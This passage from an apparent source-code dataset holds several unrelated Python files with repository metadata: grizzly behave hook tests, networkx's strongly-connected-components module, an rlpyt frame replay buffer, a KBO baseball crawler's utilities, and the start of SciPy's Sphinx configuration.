    behave = behave_fixture.context
    feature = Feature(None, None, '', '', scenarios=[behave.scenario])
    behave.scenario.steps = [Step(None, None, '', '', '')]

    # Sentinel exception: raised by the locustrun stub so the test can prove
    # whether after_feature actually invoked locust.
    class LocustRunning(Exception):
        pass
    def locustrun_running(context: Context) -> None:
        raise LocustRunning()
    mocker.patch(
        'grizzly.environment.locustrun',
        locustrun_running,
    )
    # do not start locust if feature failed
    feature.set_status(Status.failed)
    after_feature(behave, feature)
    # start locust only if it's not a dry run and the feature passed
    feature.set_status(Status.passed)
    with pytest.raises(LocustRunning):
        after_feature(behave, feature)

    # A non-zero locustrun return code must mark the feature as failed.
    def locustrun_return_not_0(context: Context) -> int:
        return 1
    mocker.patch(
        'grizzly.environment.locustrun',
        locustrun_return_not_0,
    )
    assert feature.status == Status.passed
    after_feature(behave, feature)
    assert feature.status == Status.failed
    # Without a recorded start time the duration stays zero...
    assert feature.duration == 0.0
    # ...and with one, after_feature fills in the elapsed wall-clock time.
    behave.start = time_monotonic() - 1.0
    after_feature(behave, feature)
    assert feature.duration > 0.0
def test_before_scenario(behave_fixture: BehaveFixture, mocker: MockerFixture) -> None:
    behave = behave_fixture.context

    # Stand-in for behave's matched-step object: maps a step name to the
    # registered step implementation the hook will inspect.
    class MatchedStep:
        def __init__(self, name: str) -> None:
            if name == 'background':
                self.func = step_background
            elif name == 'both':
                self.func = step_both
            elif name == 'local':
                self.func = self.step_local
            else:
                self.func = step_scenario
        def step_local(self) -> None:
            pass
    def find_match(step: Step, *args: Tuple[Any, ...], **kwargs: Dict[str, Any]) -> Optional[MatchedStep]:
        # None mirrors behave's behavior for an unmatchable step.
        if step is None:
            return None
        return MatchedStep(step.name)
    mocker.patch(
        'tests.fixtures.step_registry.find_match',
        find_match,
    )
    # Steps named after the section their implementation belongs to; placing
    # them in the wrong section should get them flagged by the hook.
    background_scenario_step = Step(filename=None, line=None, keyword='', step_type='step', name='')
    background_background_step = Step(filename=None, line=None, keyword='', step_type='step', name='background')
    scenario_background_step = Step(filename=None, line=None, keyword='', step_type='step', name='background')
    both_step = Step(filename=None, line=None, keyword='', step_type='step', name='both')
    local_step = Step(filename=None, line=None, keyword='', step_type='step', name='local')
    behave.scenario.name = 'Test Scenario'
    behave.scenario.background.steps = [
        background_scenario_step,
        background_background_step,
        both_step,
        local_step,
        None,
    ]
    behave.scenario.steps += [scenario_background_step, both_step, local_step, None]
    assert len(behave.scenario.steps) == 5
    assert len(behave.scenario.background.steps) == 5
    grizzly = cast(GrizzlyContext, behave.grizzly)
    assert len(grizzly.scenarios()) == 0
    before_scenario(behave, behave.scenario)
    # The hook registers the behave scenario as the current grizzly scenario.
    assert len(grizzly.scenarios()) == 1
    assert grizzly.scenarios()[0] is grizzly.scenario
    assert grizzly.scenario.name == 'Test Scenario'
    # Only the steps placed in the wrong section are marked 'incorrect':
    # a scenario-only step in the background...
    assert getattr(behave.scenario.background.steps[0], 'location_status', None) == 'incorrect'
    assert getattr(behave.scenario.background.steps[1], 'location_status', None) is None
    assert getattr(behave.scenario.background.steps[2], 'location_status', None) is None
    assert getattr(behave.scenario.background.steps[3], 'location_status', None) is None
    # ...and a background-only step in the scenario body.
    assert getattr(behave.scenario.steps[0], 'location_status', None) is None
    assert getattr(behave.scenario.steps[1], 'location_status', None) == 'incorrect'
    assert getattr(behave.scenario.steps[2], 'location_status', None) is None
    assert getattr(behave.scenario.steps[3], 'location_status', None) is None
    # Once the background section is done, the hook drops the background.
    grizzly.state.background_section_done = True
    grizzly.scenarios.clear()
    before_scenario(behave, behave.scenario)
    assert behave.scenario.background is None
def test_after_scenario(behave_fixture: BehaveFixture) -> None:
    behave = behave_fixture.context
    grizzly = behave_fixture.grizzly
    # An async request group left open at scenario end must fail the scenario.
    grizzly.scenario.async_group = AsyncRequestGroupTask(name='test-async-1')
    with pytest.raises(AssertionError) as ae:
        after_scenario(behave)
    assert str(ae.value) == 'async request group "test-async-1" has not been closed'
    grizzly.scenario.async_group = None
    # Likewise for timers that were started but never stopped.
    grizzly.scenario.timers['test-timer-1'] = TimerTask('test-timer-1')
    grizzly.scenario.timers['test-timer-2'] = TimerTask('test-timer-2')
    with pytest.raises(AssertionError) as ae:
        after_scenario(behave)
    assert str(ae.value) == 'timers test-timer-1, test-timer-2 has not been closed'
    grizzly.scenario.timers.clear()
    # With everything closed, the hook marks the background section as done
    # and stays idempotent on subsequent calls.
    grizzly.state.background_section_done = False
    assert not grizzly.state.background_section_done
    after_scenario(behave)
    assert getattr(grizzly.state, 'background_section_done', False)
    after_scenario(behave)
    assert grizzly.state.background_section_done
def test_before_step(behave_fixture: BehaveFixture) -> None:
    behave = behave_fixture.context
    step = Step(filename=None, line=None, keyword='', step_type='step', name='')
    behave.step = None
    before_step(behave, step)
    # The executing step is remembered on the context for later hooks.
    assert behave.step is step
    # A step flagged (by before_scenario) as being in the wrong section fails.
    setattr(step, 'location_status', 'incorrect')
    with pytest.raises(AssertionError):
        before_step(behave, step)
    # NOTE(review): this stanza duplicates the previous one verbatim --
    # possibly a copy-paste; a different location_status value may have
    # been intended here. Confirm against grizzly.environment.before_step.
    setattr(step, 'location_status', 'incorrect')
    with pytest.raises(AssertionError):
        before_step(behave, step)
def test_after_step(behave_fixture: BehaveFixture) -> None:
    # after_step currently has no observable effect; it must simply accept
    # any step without raising.
    context = behave_fixture.context
    dummy_step = Step(filename=None, line=None, keyword='', step_type='step', name='')
    after_step(context, dummy_step)
| 31.815574 | 119 | 0.687106 |
acf6968bf42c8363e8a9f97dc5d88bdeadc8b88b | 11,140 | py | Python | networkx/algorithms/components/strongly_connected.py | jmmcd/networkx | 207ff7d1e9bfaff013ac77c8d6bb79619892c994 | [
"BSD-3-Clause"
] | 1 | 2020-08-08T21:52:34.000Z | 2020-08-08T21:52:34.000Z | networkx/algorithms/components/strongly_connected.py | jmmcd/networkx | 207ff7d1e9bfaff013ac77c8d6bb79619892c994 | [
"BSD-3-Clause"
] | null | null | null | networkx/algorithms/components/strongly_connected.py | jmmcd/networkx | 207ff7d1e9bfaff013ac77c8d6bb79619892c994 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (C) 2004-2019 by
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Pieter Swart <swart@lanl.gov>
# All rights reserved.
# BSD license.
#
# Authors: Eben Kenah
# Aric Hagberg (hagberg@lanl.gov)
# Christopher Ellison
# Ben Edwards (bedwards@cs.unm.edu)
"""Strongly connected components."""
import networkx as nx
from networkx.utils.decorators import not_implemented_for
__all__ = ['number_strongly_connected_components',
'strongly_connected_components',
'is_strongly_connected',
'strongly_connected_components_recursive',
'kosaraju_strongly_connected_components',
'condensation']
@not_implemented_for('undirected')
def strongly_connected_components(G):
    """Generate nodes in strongly connected components of graph.
    Parameters
    ----------
    G : NetworkX Graph
        A directed graph.
    Returns
    -------
    comp : generator of sets
        A generator of sets of nodes, one for each strongly connected
        component of G.
    Raises
    ------
    NetworkXNotImplemented :
        If G is undirected.
    Examples
    --------
    Generate a sorted list of strongly connected components, largest first.
    >>> G = nx.cycle_graph(4, create_using=nx.DiGraph())
    >>> nx.add_cycle(G, [10, 11, 12])
    >>> [len(c) for c in sorted(nx.strongly_connected_components(G),
    ...                         key=len, reverse=True)]
    [4, 3]
    If you only want the largest component, it's more efficient to
    use max instead of sort.
    >>> largest = max(nx.strongly_connected_components(G), key=len)
    See Also
    --------
    connected_components
    weakly_connected_components
    kosaraju_strongly_connected_components
    Notes
    -----
    Uses Tarjan's algorithm[1]_ with Nuutila's modifications[2]_.
    Nonrecursive version of algorithm.
    References
    ----------
    .. [1] Depth-first search and linear graph algorithms, R. Tarjan
       SIAM Journal of Computing 1(2):146-160, (1972).
    .. [2] On finding the strongly connected components in a directed graph.
       E. Nuutila and E. Soisalon-Soinen
       Information Processing Letters 49(1): 9-14, (1994)..
    """
    preorder = {}
    lowlink = {}
    scc_found = set()
    scc_queue = []
    i = 0  # Preorder counter
    for source in G:
        if source not in scc_found:
            # Iterative DFS; ``queue`` acts as the recursion stack.
            queue = [source]
            while queue:
                v = queue[-1]
                if v not in preorder:
                    i = i + 1
                    preorder[v] = i
                done = True
                for w in G[v]:
                    if w not in preorder:
                        # Descend into the first unvisited successor.
                        queue.append(w)
                        done = False
                        break
                if done:
                    # All successors visited: compute v's low-link.
                    lowlink[v] = preorder[v]
                    for w in G[v]:
                        if w not in scc_found:
                            if preorder[w] > preorder[v]:
                                # Tree edge: propagate the child's low-link.
                                # (min of two values; the old code built a
                                # throwaway list for every edge)
                                lowlink[v] = min(lowlink[v], lowlink[w])
                            else:
                                # Back or cross edge inside the current DFS.
                                lowlink[v] = min(lowlink[v], preorder[w])
                    queue.pop()
                    if lowlink[v] == preorder[v]:
                        # v is the root of an SCC: collect every node queued
                        # after it (Nuutila's stack-of-roots variant).
                        scc = {v}
                        while scc_queue and preorder[scc_queue[-1]] > preorder[v]:
                            k = scc_queue.pop()
                            scc.add(k)
                        scc_found.update(scc)
                        yield scc
                    else:
                        scc_queue.append(v)
@not_implemented_for('undirected')
def kosaraju_strongly_connected_components(G, source=None):
    """Generate nodes in strongly connected components of graph.
    Parameters
    ----------
    G : NetworkX Graph
        A directed graph.
    Returns
    -------
    comp : generator of sets
        A generator of sets of nodes, one for each strongly connected
        component of G.
    Raises
    ------
    NetworkXNotImplemented:
        If G is undirected.
    Examples
    --------
    Generate a sorted list of strongly connected components, largest first.
    >>> G = nx.cycle_graph(4, create_using=nx.DiGraph())
    >>> nx.add_cycle(G, [10, 11, 12])
    >>> [len(c) for c in sorted(nx.kosaraju_strongly_connected_components(G),
    ...                         key=len, reverse=True)]
    [4, 3]
    If you only want the largest component, it's more efficient to
    use max instead of sort.
    >>> largest = max(nx.kosaraju_strongly_connected_components(G), key=len)
    See Also
    --------
    strongly_connected_components
    Notes
    -----
    Uses Kosaraju's algorithm.
    """
    # First pass: DFS on the reversed graph records the nodes in postorder
    # (G is only reversed for the duration of this context manager).
    with nx.utils.reversed(G):
        post = list(nx.dfs_postorder_nodes(G, source=source))
    seen = set()
    # Second pass: DFS on the original graph, taking roots in reverse
    # postorder; each tree restricted to unseen nodes is exactly one SCC.
    while post:
        r = post.pop()
        if r in seen:
            continue
        c = nx.dfs_preorder_nodes(G, r)
        new = {v for v in c if v not in seen}
        yield new
        seen.update(new)
@not_implemented_for('undirected')
def strongly_connected_components_recursive(G):
    """Generate nodes in strongly connected components of graph.
    Recursive version of algorithm.
    Parameters
    ----------
    G : NetworkX Graph
        A directed graph.
    Returns
    -------
    comp : generator of sets
        A generator of sets of nodes, one for each strongly connected
        component of G.
    Raises
    ------
    NetworkXNotImplemented :
        If G is undirected.
    Examples
    --------
    Generate a sorted list of strongly connected components, largest first.
    >>> G = nx.cycle_graph(4, create_using=nx.DiGraph())
    >>> nx.add_cycle(G, [10, 11, 12])
    >>> [len(c) for c in sorted(nx.strongly_connected_components_recursive(G),
    ...                         key=len, reverse=True)]
    [4, 3]
    If you only want the largest component, it's more efficient to
    use max instead of sort.
    >>> largest = max(nx.strongly_connected_components_recursive(G), key=len)
    To create the induced subgraph of the components use:
    >>> S = [G.subgraph(c).copy() for c in nx.weakly_connected_components(G)]
    See Also
    --------
    connected_components
    Notes
    -----
    Uses Tarjan's algorithm[1]_ with Nuutila's modifications[2]_.
    References
    ----------
    .. [1] Depth-first search and linear graph algorithms, R. Tarjan
       SIAM Journal of Computing 1(2):146-160, (1972).
    .. [2] On finding the strongly connected components in a directed graph.
       E. Nuutila and E. Soisalon-Soinen
       Information Processing Letters 49(1): 9-14, (1994)..
    """
    def visit(v, cnt):
        # ``cnt`` is the preorder number assigned to v; ``root[v]`` tracks
        # the smallest preorder number reachable from v (its low-link).
        root[v] = cnt
        visited[v] = cnt
        cnt += 1
        stack.append(v)
        for w in G[v]:
            if w not in visited:
                # Recurse; components found deeper are yielded through here.
                for c in visit(w, cnt):
                    yield c
            if w not in component:
                # w is not yet assigned to an SCC, i.e. still on the stack.
                root[v] = min(root[v], root[w])
        if root[v] == visited[v]:
            # v is the root of an SCC: pop the stack back down to v.
            component[v] = root[v]
            tmpc = {v}  # hold nodes in this component
            while stack[-1] != v:
                w = stack.pop()
                component[w] = root[v]
                tmpc.add(w)
            stack.remove(v)
            yield tmpc
    visited = {}
    component = {}
    root = {}
    cnt = 0
    stack = []
    for source in G:
        if source not in visited:
            for c in visit(source, cnt):
                yield c
@not_implemented_for('undirected')
def number_strongly_connected_components(G):
    """Returns number of strongly connected components in graph.
    Parameters
    ----------
    G : NetworkX graph
        A directed graph.
    Returns
    -------
    n : integer
        Number of strongly connected components
    Raises
    ------
    NetworkXNotImplemented:
        If G is undirected.
    See Also
    --------
    strongly_connected_components
    number_connected_components
    number_weakly_connected_components
    Notes
    -----
    For directed graphs only.
    """
    # Count the components as they are generated, without keeping them.
    return sum(1 for _ in strongly_connected_components(G))
@not_implemented_for('undirected')
def is_strongly_connected(G):
    """Test directed graph for strong connectivity.
    A directed graph is strongly connected if and only if every vertex in
    the graph is reachable from every other vertex.
    Parameters
    ----------
    G : NetworkX Graph
        A directed graph.
    Returns
    -------
    connected : bool
        True if the graph is strongly connected, False otherwise.
    Raises
    ------
    NetworkXNotImplemented:
        If G is undirected.
    See Also
    --------
    is_weakly_connected
    is_semiconnected
    is_connected
    is_biconnected
    strongly_connected_components
    Notes
    -----
    For directed graphs only.
    """
    if len(G) == 0:
        raise nx.NetworkXPointlessConcept(
            """Connectivity is undefined for the null graph.""")
    # The SCCs partition the nodes, so the graph is strongly connected iff
    # the first component already contains every node.  Consuming only the
    # first component avoids materializing the full SCC list as the
    # previous ``list(...)[0]`` implementation did.
    return len(next(strongly_connected_components(G))) == len(G)
@not_implemented_for('undirected')
def condensation(G, scc=None):
    """Returns the condensation of G.
    The condensation of G is the graph with each of the strongly connected
    components contracted into a single node.
    Parameters
    ----------
    G : NetworkX DiGraph
        A directed graph.
    scc: list or generator (optional, default=None)
        Strongly connected components. If provided, the elements in
        `scc` must partition the nodes in `G`. If not provided, it will be
        calculated as scc=nx.strongly_connected_components(G).
    Returns
    -------
    C : NetworkX DiGraph
        The condensation graph C of G. The node labels are integers
        corresponding to the index of the component in the list of
        strongly connected components of G. C has a graph attribute named
        'mapping' with a dictionary mapping the original nodes to the
        nodes in C to which they belong. Each node in C also has a node
        attribute 'members' with the set of original nodes in G that
        form the SCC that the node in C represents.
    Raises
    ------
    NetworkXNotImplemented:
        If G is undirected.
    Notes
    -----
    After contracting all strongly connected components to a single node,
    the resulting graph is a directed acyclic graph.
    """
    if scc is None:
        scc = nx.strongly_connected_components(G)
    # mapping: original node -> index of its component in C.
    mapping = {}
    # members: component index -> set of original nodes.
    members = {}
    C = nx.DiGraph()
    # Add mapping dict as graph attribute
    C.graph['mapping'] = mapping
    if len(G) == 0:
        return C
    for i, component in enumerate(scc):
        members[i] = component
        mapping.update((n, i) for n in component)
    # Safe because G is non-empty here, so the loop ran at least once.
    number_of_components = i + 1
    C.add_nodes_from(range(number_of_components))
    # Keep only edges that cross component boundaries (drops self-loops in C).
    C.add_edges_from((mapping[u], mapping[v]) for u, v in G.edges()
                     if mapping[u] != mapping[v])
    # Add a list of members (ie original nodes) to each node (ie scc) in C.
    nx.set_node_attributes(C, members, 'members')
    return C
acf697521ba2301a3e281a9c4ef891400c0ba9a1 | 2,760 | py | Python | rlpyt/replays/frame.py | vzhuang/rlpyt | 3abf873e4bae0cd9cccbb9e5c9cc4c875710f6b6 | [
"MIT"
] | 5 | 2021-02-19T01:35:22.000Z | 2022-03-29T20:48:34.000Z | rlpyt/replays/frame.py | vzhuang/rlpyt | 3abf873e4bae0cd9cccbb9e5c9cc4c875710f6b6 | [
"MIT"
] | 3 | 2021-09-08T03:31:49.000Z | 2022-03-12T00:59:45.000Z | rlpyt/replays/frame.py | vzhuang/rlpyt | 3abf873e4bae0cd9cccbb9e5c9cc4c875710f6b6 | [
"MIT"
] | 2 | 2021-04-17T09:11:56.000Z | 2022-03-24T04:21:17.000Z |
from rlpyt.utils.buffer import buffer_from_example, get_leading_dims
from rlpyt.utils.collections import namedarraytuple
from rlpyt.utils.logging import logger
BufferSamples = None
class FrameBufferMixin:
    """
    Like n-step return buffer but expects multi-frame input observation where
    each new observation has one new frame and the rest old; stores only
    unique frames to save memory. Samples observation should be shaped:
    [T,B,C,..] with C the number of frames. Expects frame order: OLDEST to
    NEWEST.
    A special method for replay will be required to piece the frames back
    together into full observations.
    Latest n_steps up to cursor temporarily invalid because "next" not yet
    written. Cursor timestep invalid because previous action and reward
    overwritten. NEW: Next n_frames-1 invalid because observation history
    frames overwritten.
    """
    def __init__(self, example, **kwargs):
        # Strip 'observation' out of the per-step sample fields; observations
        # are stored separately as de-duplicated frames (see below).
        field_names = [f for f in example._fields if f != "observation"]
        global BufferSamples
        BufferSamples = namedarraytuple("BufferSamples", field_names)
        buffer_example = BufferSamples(*(v for k, v in example.items()
            if k != "observation"))
        # Cooperative mixin: the sibling buffer class allocates the non-frame
        # fields and defines self.T, self.B, self.async_, self.off_forward.
        super().__init__(example=buffer_example, **kwargs)
        # Equivalent to image.shape[0] if observation is image array (C,H,W):
        self.n_frames = n_frames = get_leading_dims(example.observation,
            n_dim=1)[0]
        logger.log(f"Frame-based buffer using {n_frames}-frame sequences.")
        # frames: oldest stored at t; duplicate n_frames - 1 beginning & end.
        self.samples_frames = buffer_from_example(example.observation[0],
            (self.T + n_frames - 1, self.B),
            share_memory=self.async_)  # [T+n_frames-1,B,H,W]
        # new_frames: shifted so newest stored at t; no duplication.
        self.samples_new_frames = self.samples_frames[n_frames - 1:]  # [T,B,H,W]
        # Reading near the cursor needs n_frames-1 valid history frames.
        self.off_forward = max(self.off_forward, n_frames - 1)
    def append_samples(self, samples):
        """Appends all samples except for the `observation` as normal.
        Only the new frame in each observation is recorded."""
        t, fm1 = self.t, self.n_frames - 1
        buffer_samples = BufferSamples(*(v for k, v in samples.items()
            if k != "observation"))
        # Superclass writes the non-observation fields and advances self.t.
        T, idxs = super().append_samples(buffer_samples)
        # Store only the newest frame of each observation (frame axis is
        # ordered oldest->newest, so index -1 is the new frame).
        self.samples_new_frames[idxs] = samples.observation[:, :, -1]
        if t == 0:  # Starting: write early frames
            for f in range(fm1):
                self.samples_frames[f] = samples.observation[0, :, f]
        elif self.t < t:  # Wrapped: copy duplicate frames.
            # self.t < t signals the circular cursor wrapped during append.
            self.samples_frames[:fm1] = self.samples_frames[-fm1:]
        return T, idxs
acf6980ffda245c95ff4027da89d21a807a4f4bd | 5,680 | py | Python | legacy/utils.py | yagongso/KBO_crawler | c799b5c010a78ee2ca96a5a279655e962c4d1f40 | [
"MIT"
] | 7 | 2018-03-31T12:02:40.000Z | 2021-04-30T00:22:28.000Z | legacy/utils.py | yagongso/KBO_crawler | c799b5c010a78ee2ca96a5a279655e962c4d1f40 | [
"MIT"
] | null | null | null | legacy/utils.py | yagongso/KBO_crawler | c799b5c010a78ee2ca96a5a279655e962c4d1f40 | [
"MIT"
] | 3 | 2018-05-17T07:45:09.000Z | 2019-01-18T11:59:29.000Z | #utils.py
import datetime
import argparse
import http.client
from urllib.parse import urlparse
from urllib.request import urlopen
import time
import requests
def get_args(output, options):
    """Parse the crawler's command-line arguments.

    Side effects (both lists are mutated in place):
        options: three booleans appended, in order [c, d, p].
        output: four ints appended, in order
            [min_month, max_month, min_year, max_year].

    Returns:
        The ArgumentParser instance (callers reuse it for help output).

    Calls exit(1) on any invalid input combination.
    """
    # convert arguments
    # check if not number, integer
    parser = argparse.ArgumentParser(description='Get pitch by pitch data.')
    parser.add_argument('dates',
                        metavar='dates',
                        type=int,
                        nargs='*',
                        default=datetime.datetime.now().year,
                        help='start/end (month/year); year > 2007')
    parser.add_argument('-c',
                        action='store_true',
                        help='convert pitch data to .csv format')
    parser.add_argument('-d',
                        action='store_true',
                        help='Download pitch data')
    parser.add_argument('-p',
                        action='store_true',
                        help='Download pitch f/x data only')
    args = parser.parse_args()
    options.append(args.c)
    options.append(args.d)
    options.append(args.p)
    # The three mode flags are mutually exclusive.
    if (args.c and args.p) or (args.c and args.d) or (args.d and args.p):
        print('choose one option at once!\n')
        parser.print_help()
        exit(1)
    dates = args.dates
    now = datetime.datetime.now()
    # With no positional args, argparse returns the int default (current
    # year) rather than a list -- hence this type check.
    if type(dates) is int:
        # month or year?
        if dates > 12:
            # year
            if (dates < 2008) or (dates > now.year):
                print('invalid year')
                exit(1)
            else:
                year = dates
                if year == now.year:
                    # current season
                    if now.month < 3:
                        print('invalid year : season has not begun...')
                        exit(1)
                    else:
                        # dates = [now.year, now.year, 3, now.month]
                        output.append(3)
                        output.append(now.month)
                else:
                    # previous season
                    # dates = [year, year, 3, 10]
                    output.append(3)
                    output.append(10)
                output.append(year)
                output.append(year)
        elif dates > 0:
            # month
            # NOTE(review): this single-month path restricts months to 3~10
            # while the multi-value path below accepts 1~12 -- confirm which
            # range is intended.
            if (dates < 3) or (dates > 10):
                print('invalid month : possible range is 3~10')
                exit(1)
            else:
                month = dates
                if month <= now.month:
                    # dates = [now.year, now.year, month, month]
                    output.append(month)
                    output.append(month)
                    output.append(now.year)
                    output.append(now.year)
                else:
                    # trying for future...
                    print('invalid month : current month is {}; you entered{}.'.format(now.month, month))
                    exit(1)
        else:
            print('invalid parameter')
            exit(1)
    elif len(dates) > 4:
        print('too many date option')
        exit(1)
    else:
        # Multiple values: classify each as a month (1~12) or a year.
        months = []
        years = []
        for d in dates:
            # (bitwise & on bools works here, though `and` is conventional)
            if (d > 12) & (d > 2007) & (d <= now.year):
                years.append(d)
            elif (d >= 1) & (d <= 12):
                months.append(d)
            else:
                print('invalid date')
                print('possible year range: 2008~%d'%(now.year))
                print('possible month range: 1~12')
                exit(1)
        if len(years) > 2:
            print('too many year')
            exit(1)
        if len(months) > 2:
            print('too many month')
            exit(1)
        # Defaults: full season (3~10) of the current year.
        mmin = 3
        mmax = 3
        ymin = now.year
        ymax = now.year
        if len(months) == 0:
            mmin = 3
            mmax = 10
        elif len(months) == 1:
            mmin = mmax = months[0]
        else:
            mmin = min(months)
            mmax = max(months)
        if len(years) == 0:
            ymin = now.year
            ymax = now.year
        elif len(years) == 1:
            ymin = ymax = years[0]
        else:
            ymin = min(years)
            ymax = max(years)
        output.append(mmin)
        output.append(mmax)
        output.append(ymin)
        output.append(ymax)
    return parser
def print_progress(bar_prefix, total, done, skipped):
    """Render a one-line, carriage-return progress bar on stdout.

    Args:
        bar_prefix: Text printed before the bar (e.g. a label).
        total: Total number of work items; nothing is printed when <= 0.
        done: Number of items completed.
        skipped: Number of items skipped (counted as finished).
    """
    if total <= 0:
        return
    finished = done + skipped
    if total > 30:
        # Scale the bar down to a fixed width of 30 characters.
        width = 30
        filled = int(float(finished) / float(total) * 30)
    else:
        # One bar character per item when the total is small.
        width = total
        filled = finished
    bar = '+' * filled + '-' * (width - filled)
    print('\r{}[{}] {} / {}, {:2.1f} %'.format(
        bar_prefix, bar, finished, total,
        float(finished) / float(total) * 100), end="")
def check_url(url):
    """Return True if a HEAD request to *url* gets a non-error status (<400).

    NOTE(review): this always uses plain HTTPConnection (port 80); https
    URLs are not actually requested over TLS -- confirm callers only pass
    http URLs.
    """
    p = urlparse(url)
    conn = http.client.HTTPConnection(p.netloc)
    try:
        conn.request('HEAD', p.path)
        resp = conn.getresponse()
        return resp.status < 400
    finally:
        # Bug fix: the connection was previously never closed (socket leak).
        conn.close()
def check_url2(url):
    """Return True if a GET request to *url* gets a non-error status (<400)."""
    resp = requests.get(url)
    try:
        return resp.status_code < 400
    finally:
        # Close even if reading the status raises (previously leaked then).
        resp.close()
def retry_urlopen(url, num_of_retries=10, time_interval=2):
    """Open *url*, retrying on any error.

    Args:
        url: URL passed to ``urllib.request.urlopen`` (10 s timeout per try).
        num_of_retries: Maximum number of attempts.
        time_interval: Seconds to sleep between attempts.

    Returns:
        The open response object from the first successful attempt.

    Raises:
        The exception from the last failed attempt once all retries are
        exhausted.  (The original for/else bare ``raise`` outside an
        ``except`` block raised ``RuntimeError: No active exception to
        re-raise`` instead of the real error; the dead ``break`` after
        ``return`` is also gone.)
    """
    last_error = None
    for _ in range(num_of_retries):
        try:
            return urlopen(url, timeout=10)
        except Exception as exc:  # network hiccups, timeouts, HTTP errors
            last_error = exc
            time.sleep(time_interval)
    raise last_error
acf698e358de22b03147c64d210d31a949a99e97 | 16,004 | py | Python | doc/source/conf.py | lorentzenchr/scipy | 393a05ee927883ad6316b7092c851afea8f16816 | [
"BSD-3-Clause"
] | 9,095 | 2015-01-02T18:24:23.000Z | 2022-03-31T20:35:31.000Z | doc/source/conf.py | lorentzenchr/scipy | 393a05ee927883ad6316b7092c851afea8f16816 | [
"BSD-3-Clause"
] | 11,500 | 2015-01-01T01:15:30.000Z | 2022-03-31T23:07:35.000Z | doc/source/conf.py | lorentzenchr/scipy | 393a05ee927883ad6316b7092c851afea8f16816 | [
"BSD-3-Clause"
] | 5,838 | 2015-01-05T11:56:42.000Z | 2022-03-31T23:21:19.000Z | # -*- coding: utf-8 -*-
import sys, os, re
import glob
from datetime import date
import warnings
import numpy as np
# Currently required to build scipy.fft docs
os.environ['_SCIPY_BUILDING_DOC'] = 'True'
# Check Sphinx version
import sphinx
if sphinx.__version__ < "2.0":
raise RuntimeError("Sphinx 2.0 or newer required")
needs_sphinx = '2.0'
# Workaround for sphinx-doc/sphinx#6573
# ua._Function should not be treated as an attribute
from sphinx.util import inspect
import scipy._lib.uarray as ua
old_isdesc = inspect.isdescriptor
inspect.isdescriptor = (lambda obj: old_isdesc(obj)
and not isinstance(obj, ua._Function))
# -----------------------------------------------------------------------------
# General configuration
# -----------------------------------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
sys.path.insert(0, os.path.abspath('../sphinxext'))
sys.path.insert(0, os.path.abspath(os.path.dirname(__file__)))
import numpydoc.docscrape as np_docscrape # noqa:E402
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.intersphinx',
'numpydoc',
'sphinx_panels',
'scipyoptdoc',
'doi_role',
'matplotlib.sphinxext.plot_directive',
]
# Determine if the matplotlib has a recent enough version of the
# plot_directive.
from matplotlib.sphinxext import plot_directive
if plot_directive.__version__ < 2:
raise RuntimeError("You need a recent enough version of matplotlib")
# Do some matplotlib config in case users have a matplotlibrc that will break
# things
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
plt.ioff()
# sphinx-panels shouldn't add bootstrap css since the pydata-sphinx-theme
# already loads it
panels_add_bootstrap_css = False
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General substitutions.
project = 'SciPy'
copyright = '2008-%s, The SciPy community' % date.today().year
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
import scipy
version = re.sub(r'\.dev-.*$', r'.dev', scipy.__version__)
release = scipy.__version__
print("%s (VERSION %s)" % (project, version))
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# The reST default role (used for this markup: `text`) to use for all documents.
default_role = "autolink"
# List of directories, relative to source directories, that shouldn't be searched
# for source files.
exclude_dirs = []
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = False
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
# pygments_style = 'sphinx'
# Ensure all our internal links work
nitpicky = True
nitpick_ignore = [
# This ignores errors for classes (OptimizeResults, sparse.dok_matrix)
# which inherit methods from `dict`. missing references to builtins get
# ignored by default (see https://github.com/sphinx-doc/sphinx/pull/7254),
# but that fix doesn't work for inherited methods.
("py:class", "a shallow copy of D"),
("py:class", "a set-like object providing a view on D's keys"),
("py:class", "a set-like object providing a view on D's items"),
("py:class", "an object providing a view on D's values"),
("py:class", "None. Remove all items from D."),
("py:class", "(k, v), remove and return some (key, value) pair as a"),
("py:class", "None. Update D from dict/iterable E and F."),
("py:class", "v, remove specified key and return the corresponding value."),
]
exclude_patterns = [ # glob-style
]
# be strict about warnings in our examples, we should write clean code
# (exceptions permitted for pedagogical purposes below)
warnings.resetwarnings()
warnings.filterwarnings('error')
# allow these and show them
warnings.filterwarnings('default', module='sphinx') # internal warnings
# global weird ones that can be safely ignored
for key in (
r"'U' mode is deprecated", # sphinx io
r"OpenSSL\.rand is deprecated", # OpenSSL package in linkcheck
r"Using or importing the ABCs from", # 3.5 importlib._bootstrap
r"'contextfunction' is renamed to 'pass_context'", # Jinja
):
warnings.filterwarnings( # deal with other modules having bad imports
'ignore', message=".*" + key, category=DeprecationWarning)
warnings.filterwarnings( # matplotlib<->pyparsing issue
'ignore', message="Exception creating Regex for oneOf.*",
category=SyntaxWarning)
# warnings in examples (mostly) that we allow
# TODO: eventually these should be eliminated!
for key in (
'invalid escape sequence', # numpydoc 0.8 has some bad escape chars
'The integral is probably divergent', # stats.mielke example
'underflow encountered in square', # signal.filtfilt underflow
'underflow encountered in multiply', # scipy.spatial.HalfspaceIntersection
'underflow encountered in nextafter', # tuterial/interpolate.rst
# stats.skewnorm, stats.norminvgauss, stats.gaussian_kde,
# tutorial/stats.rst (twice):
'underflow encountered in exp',
):
warnings.filterwarnings(
'once', message='.*' + key)
# -----------------------------------------------------------------------------
# HTML output
